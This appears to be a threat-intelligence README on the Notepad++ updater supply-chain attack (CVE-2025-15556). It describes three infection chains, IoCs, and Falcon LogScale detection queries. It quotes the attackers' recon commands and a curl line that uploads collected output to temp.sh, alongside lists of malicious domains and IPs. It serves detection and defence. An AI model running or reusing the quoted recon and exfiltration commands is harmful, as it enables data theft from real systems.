
IoCs and detection rules for the Notepad++ supply chain attack (CVE-2025-15556) — Lotus Blossom APT, June–December 2025. Includes Falcon LogScale queries, YARA/Sigma rules, and MITRE ATT&CK mapping.
CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | June – December 2025
This repository contains a comprehensive, consolidated collection of Indicators of Compromise (IoCs) related to the Notepad++ supply chain attack disclosed on February 2, 2026.
Between June and December 2025, a Chinese state-sponsored threat actor compromised the hosting infrastructure of Notepad++, hijacking the built-in update mechanism (WinGUp) to selectively deliver trojanized installers to targeted users. The attack exploited the lack of cryptographic verification in the updater (pre-v8.8.9), enabling the distribution of custom backdoors, Cobalt Strike Beacons, and Metasploit payloads.
| CVE | CVE-2025-15556 — Download of code without integrity check |
| Threat Actor | Lotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon) |
| Active Period | June 2025 – December 2, 2025 |
| Attack Vector | Supply chain compromise via WinGUp auto-updater |
| Targets | Government, telecom, financial services, IT providers (Philippines, Vietnam, El Salvador, Australia, East Asia) |
| Malware | Chrysalis backdoor (custom), Cobalt Strike Beacon, Metasploit Meterpreter |
| Patched in | Notepad++ v8.8.9+ (certificate verification) / v8.9.1+ (XMLDSig validation) |
Kaspersky GReAT identified three distinct infection chains, rotated approximately monthly to evade detection:
GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
→ Metasploit downloader → Cobalt Strike Beacon
whoami && tasklist → exfiltrated via temp.sh%appdata%\ProShow\GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
→ shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
whoami && tasklist && systeminfo && netstat -ano%appdata%\Adobe\Scripts\GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
→ decrypts "BluetoothService" shellcode → Chrysalis backdoor
%appdata%\Bluetooth\C:\ProgramData\USOShared\ ┌─────────────────────────────────────────────────────────┐
│ COMPROMISE TIMELINE │
├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
│ Jul 25 │ Aug 25 │ Sep 25 │ Oct 25 │ Nov 25 │Dec 25│
├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
Chain #1 (ProShow) │████████████████████ │
Chain #2 (Lua) │ █████████████████████████████ │
Chain #3 (DLL SL) │ ██████████████ │
Infra access │████████████████████████████████████████████████████████│
└────────────────────────────────────────────────────────┘
| File | Description |
|---|---|
notepadpp_supply_chain_iocs.csv | Full IoC dataset (105 indicators) with MITRE ATT&CK mapping |
| Column | Description |
|---|---|
ioc_type | Type: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window |
ioc_value | The indicator value |
chain | Infection chain (1, 2, 3, 1/2, 2/3, all, n/a) |
context | Description of what the IoC represents |
source | Intelligence source (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont) |
risk | Severity (CRITICAL, HIGH, MEDIUM, LOW, INFO) |
mitre_technique | MITRE ATT&CK technique ID |
Behavioral — IoC-agnostic, highest value:
gup.exe spawning any child process other than a legitimate signed Notepad++ installergup.exe connecting to domains/IPs other than notepad-plus-plus.org, github.com, release-assets.githubusercontent.com%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\%localappdata%\Temp\ns.tmp\ (NSIS runtime — present in all chains)Network — high confidence:
cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.comtemp.sh (51.91.79.17) — especially with file upload via curltemp.sh URLs embedded in the User-Agent header45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210Recon commands (post-exploitation):
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
// Malicious IPs
RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
| iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
// Malicious Domains
DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
| iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
// Suspicious filenames
ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
| iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
// Suspicious DLLs
ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
| iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
// Chain-specific artifacts
ImageFileName=/\\(alien\.ini|load)$/i
| iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
* | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)